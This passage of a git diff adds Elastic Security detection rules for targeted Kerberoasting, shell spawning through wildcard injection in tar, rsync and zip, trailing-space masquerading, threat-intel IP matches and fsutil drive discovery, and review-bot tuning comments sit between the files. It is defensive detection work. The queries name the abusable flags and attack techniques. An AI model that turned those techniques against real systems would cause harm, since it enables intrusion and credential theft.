"type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "0abf0c5b-62dd-48d2-ac4e-6b43fe3a6e83_6", + "type": "security-rule" +} \ No newline at 
end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_109.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_109.json new file mode 100644 index 00000000000..ea281092245 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_109.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user account has the servicePrincipalName attribute modified. Attackers can abuse write privileges over a user to configure Service Principle Names (SPNs) so that they can perform Kerberoasting. Administrators can also configure this for legitimate purposes, exposing the account to Kerberoasting.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "User account exposed to Kerberoasting", + "note": "## Triage and analysis\n\n### Investigating User account exposed to Kerberoasting\n\nService Principal Names (SPNs) are names by which Kerberos clients uniquely identify service instances for Kerberos target computers.\n\nBy default, only computer accounts have SPNs, which creates no significant risk, since machine accounts have a default domain policy that rotates their passwords every 30 days, and the password is composed of 120 random characters, making them invulnerable to Kerberoasting.\n\nA user account with an SPN assigned is considered a service account, and is accessible to the entire domain. If any user in the directory requests a ticket-granting service (TGS), the domain controller will encrypt it with the secret key of the account executing the service. An attacker can potentially perform a Kerberoasting attack with this information, as the human-defined password is likely to be less complex.\n\nFor scenarios where SPNs cannot be avoided on user accounts, Microsoft provides the Group Managed Service Accounts (gMSA) feature, which ensures that account passwords are robust and changed regularly and automatically. 
More information can be found [here](https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview).\n\nAttackers can also perform \"Targeted Kerberoasting\", which consists of adding fake SPNs to user accounts that they have write privileges to, making them potentially vulnerable to Kerberoasting.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate if the target account is a member of privileged groups (Domain Admins, Enterprise Admins, etc.).\n- Investigate if tickets have been requested for the target account.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- The use of user accounts as service accounts is a bad security practice and should not be allowed in the domain. The security team should map and monitor any potential benign true positive (B-TP), especially if the account is privileged. Domain Administrators that define this kind of setting can put the domain at risk as user accounts don't have the same security standards as computer accounts (which have long, complex, random passwords that change frequently), exposing them to credential cracking attacks (Kerberoasting, brute force, etc.).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:\"Directory Service Changes\" and event.code:5136 and\n winlog.event_data.OperationType:\"%%14674\" and\n winlog.event_data.ObjectClass:\"user\" and\n winlog.event_data.AttributeLDAPDisplayName:\"servicePrincipalName\"\n", + "references": [ + "https://www.thehacker.recipes/ad/movement/access-controls/targeted-kerberoasting", + "https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/", + "https://www.thehacker.recipes/ad/movement/kerberos/kerberoast", + "https://attack.stealthbits.com/cracking-kerberos-tgs-tickets-using-kerberoasting", + "https://adsecurity.org/?p=280", + "https://github.com/OTRF/Set-AuditRule" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectClass", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OperationType", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit 
Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_5.json b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_5.json new file mode 100644 index 00000000000..b6fb9caacab --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0b803267-74c5-444d-ae29-32b5db2d562a_5.json 
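Review bot: The `setup` text's `Set-AuditRule` example only targets `AD:\CN=Users,DC=Domain,DC=com` with `-InheritanceFlags Children`, so user objects that live in other OUs would not produce event 5136 for `servicePrincipalName` writes and this rule would never fire for them. The setup section should say so explicitly, e.g. `Apply the audit rule to every container or OU that holds user accounts (or at the domain root with inheritance); SPN changes on accounts outside CN=Users are otherwise not logged.` If `%%14674` is the value-added operation type, as the query appears to assume, SPN removals are intentionally not alerted on; one line in a `note` stating that would save analysts from chasing that gap during triage.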
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Shell via Wildcard Injection Detected", + "query": "sequence by host.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name == \"tar\" and process.args : \"--checkpoint=*\" and process.args : \"--checkpoint-action=*\") or\n (process.name == \"rsync\" and process.args : \"-e*\") or\n (process.name == \"zip\" and process.args == \"--unzip-command\") )] by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.parent.name : (\"tar\", \"rsync\", \"zip\") and \n process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] by process.parent.entity_id\n", + "references": [ + "https://www.exploit-db.com/papers/33930" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0b803267-74c5-444d-ae29-32b5db2d562a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "0b803267-74c5-444d-ae29-32b5db2d562a_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_2.json b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_2.json new file mode 100644 index 00000000000..d27c958c23b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c093569-dff9-42b6-87b1-0242d9f7d9b4_2.json 
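Review bot: `maxspan=1s` is tight for the `tar` branch of the sequence: a `--checkpoint=*` action only runs once the configured number of records has been written, so on a sizeable tree the child shell can plausibly start more than a second after the `tar` exec and the second stage would not be joined, whereas the `rsync -e` and `zip --unzip-command` branches spawn almost immediately. Consider widening to e.g. `sequence by host.id with maxspan=30s` or documenting the 1s choice in a `note`. The `process.args : "-e*"` wildcard also matches any argument beginning with `-e`, not only the remote-shell flag; if that is meant as a coarse pre-filter, a short remark in the `description` would help tuning.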
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identify instances where adversaries include trailing space characters to mimic regular files, disguising their activity to evade default file handling mechanisms.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Processes with Trailing Spaces", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name : \"* \"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0c093569-dff9-42b6-87b1-0242d9f7d9b4", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.006", + "name": "Space after Filename", + "reference": "https://attack.mitre.org/techniques/T1036/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": 
"0c093569-dff9-42b6-87b1-0242d9f7d9b4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_6.json b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_6.json new file mode 100644 index 00000000000..838518e7c1e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c41e478-5263-4c69-8f9e-7dfd2c22da64_6.json 
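Review bot: The query has no `host.os.type` clause even though the rule is tagged `OS: Linux` and `OS: macOS`; the `logs-endpoint.events.*` and `endgame-*` patterns also carry Windows process events, so the scope currently relies on Windows never emitting a `process.name` with a trailing space rather than on an explicit filter. Adding `host.os.type in ("linux", "macos") and` after `process where ` would make the intended scope explicit and consistent with the other rules in this commit, which all constrain `host.os.type`. The matching `{"ecs": true, "name": "host.os.type", "type": "keyword"}` entry would then need to be added to `required_fields`.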
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule is triggered when an IP address indicator from the Threat Intel Filebeat module or integrations has a match against a network event.", + "from": "now-65m", + "index": [ + "auditbeat-*", + "endgame-*", + "filebeat-*", + "logs-*", + "packetbeat-*", + "winlogbeat-*" + ], + "interval": "1h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Threat Intel IP Address Indicator Match", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel IP Address Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index.\n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when an IP address indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against a network event.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation so you can understand the nature of the connection. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the IP address, which can be found in the `threat.indicator.matched.atomic` field:\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Execute a reverse DNS lookup to retrieve hostnames associated with the given IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- When a match is found, it's important to consider the indicator's initial release date. Threat intelligence is useful for augmenting existing security processes but can quickly become outdated. In other words, some threat intelligence only represents a specific set of activity observed at a specific time. For example, an IP address may have hosted malware observed in a Dridex campaign months ago, but it's possible that IP has been remediated and no longer represents any threat.\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). 
Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "source.ip:* or destination.ip:*\n", + "references": [ + "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", + "https://www.elastic.co/guide/en/security/master/es-threat-intel-integrations.html", + "https://www.elastic.co/security/tip" + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 99, + "rule_id": "0c41e478-5263-4c69-8f9e-7dfd2c22da64", + "setup": "## Setup\n\nThis rule needs threat intelligence indicators to work.\nThreat intelligence indicators can be collected using an [Elastic Agent 
integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration),\nthe [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration),\nor a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).\n", + "severity": "critical", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Rule Type: Indicator Match" + ], + "threat_filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.category", + "negate": false, + "params": { + "query": "threat" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.category": "threat" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.kind", + "negate": false, + "params": { + "query": "enrichment" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "enrichment" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "disabled": false, + "key": "event.type", + "negate": false, + "params": { + "query": "indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.type": "indicator" + } + } + } + ], + "threat_index": [ + "filebeat-*", + "logs-ti_*" + ], + "threat_indicator_path": "threat.indicator", + "threat_language": "kuery", + "threat_mapping": [ + { + "entries": [ + { + "field": "source.ip", + "type": "mapping", + "value": "threat.indicator.ip" + } + ] + }, + { + "entries": [ + { + "field": "destination.ip", + "type": "mapping", + "value": "threat.indicator.ip" + } + ] + } + ], + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.ip:* and not 
labels.is_ioc_transform_source:\"true\"", + "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", + "timeline_title": "Generic Threat Match Timeline", + "timestamp_override": "event.ingested", + "type": "threat_match", + "version": 6 + }, + "id": "0c41e478-5263-4c69-8f9e-7dfd2c22da64_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108.json new file mode 100644 index 00000000000..f7a88d8de9d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108.json 
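Review bot: `threat_query` admits every indicator with `threat.indicator.ip:*`, so the loopback and well-known benign addresses that the rule's own False Positive Analysis warns about (e.g. `127.0.0.1`) become critical-severity matches against every event carrying `source.ip` or `destination.ip`. Consider excluding loopback and private ranges in `threat_query` (the `ip` field type accepts CIDR notation, e.g. `and not threat.indicator.ip:(127.0.0.0/8 or 10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)`), or at least say in `setup` that feeds must be curated for such entries before ingestion. Separately, the opening sentence of `note` describes matching "a file hash" although this rule matches IP indicators, and `tags` lists only `OS: Windows` while the index list includes cross-platform sources such as `auditbeat-*` and `packetbeat-*`.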
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows file system utility (fsutil.exe) to gather information about attached peripheral devices and components connected to a computer system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Peripheral Device Discovery", + "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to the computer, which can be used to identify secondary drives used for backups, mapped network drives, and removable media. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage services.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"fsutil.exe\" or ?process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default 
fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1120", + "name": "Peripheral Device Discovery", + "reference": "https://attack.mitre.org/techniques/T1120/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109.json b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109.json new file mode 100644 index 00000000000..eebb76d47f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109.json 
